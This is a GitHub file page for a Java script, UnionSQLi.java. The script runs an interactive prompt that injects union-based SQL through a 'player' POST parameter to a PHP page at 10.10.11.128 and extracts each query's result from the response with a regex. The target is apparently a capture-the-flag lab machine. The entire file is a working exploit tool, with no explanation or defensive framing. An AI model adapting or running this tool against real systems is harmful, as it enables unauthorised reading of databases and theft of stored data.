-
Notifications
You must be signed in to change notification settings - Fork 12
Expand file tree
/
Copy pathUnionSQLi.java
More file actions
executable file
·76 lines (60 loc) · 2.19 KB
/
UnionSQLi.java
File metadata and controls
executable file
·76 lines (60 loc) · 2.19 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
//usr/bin/env java $0 $@; exit $?
package scripts;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Scanner;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class UnionSQLi {
private static final String POST_URL = "http://10.10.11.128/index.php";
private static final String POST_DATA = "player=' union %s -- -";
private static final Pattern PATTERN = Pattern.compile("Sorry, ([\\s\\S]*?) you are not eligible due to already qualifying.");
public static void main(String[] args) {
try (Scanner in = new Scanner(System.in)) {
while (true) {
System.out.print("SQLi> ");
String sqli = in.nextLine();
if (sqli.equals("exit")) {
break;
} else if (sqli.isEmpty()) {
continue;
}
String response = sendPOST(sqli);
if (response.startsWith("Sorry")) {
System.out.println(filterResult(response));
} else {
System.out.println("ERROR");
}
}
} catch (IOException e) {
System.out.println("ERROR");
}
}
private static String sendPOST(String sqli) throws IOException {
URL url = new URL(POST_URL);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(String.format(POST_DATA, sqli).getBytes());
outputStream.flush();
outputStream.close();
if (httpURLConnection.getResponseCode() == HttpURLConnection.HTTP_OK) {
try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream()))) {
return bufferedReader.lines().map(line -> line + "\n").reduce(String::concat).orElse("");
} catch (IOException e) {
System.out.println("ERROR");
}
}
return "";
}
private static String filterResult(String response) {
Matcher matcher = PATTERN.matcher(response);
matcher.find();
return matcher.group(1);
}
}